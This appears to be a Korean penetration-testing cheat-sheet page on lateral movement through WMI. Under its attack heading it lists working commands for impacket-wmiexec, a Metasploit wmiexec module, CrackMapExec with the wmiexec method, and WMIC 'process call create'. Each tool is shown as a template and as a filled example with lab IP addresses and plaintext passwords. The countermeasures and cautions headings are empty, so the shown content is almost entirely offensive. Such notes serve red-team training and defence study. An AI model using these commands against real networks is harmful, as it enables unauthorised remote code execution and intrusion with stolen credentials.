WMI
전제 조건
공격
# impacket
impacket-wmiexec '<domain>/<user>:<pass>@<FQDN/IP> -shell-type powershell
impacket-wmiexec 'pci.choi.local/low:Password123!'@192.168.40.161 -shell-type powershell
# Metasploit
use auxiliary/scanner/smb/impacket/wmiexec
# CrackMapexec
cme smb <target> -u <user> -p <pass> -d <domain> --exec-method wmiexec -X whoami
cme smb 192.168.40.150 -u Administrator -p 'Password123!' --exec-method wmiexec -X whoamiWMIC.exe /node:<ip> /user:<user> process call create "<process>"
WMIC.exe /node:192.168.40.160 /user:Administrator process call create "notepad.exe"대응 방안


대응 방안 - 주의점
레퍼런스
Last updated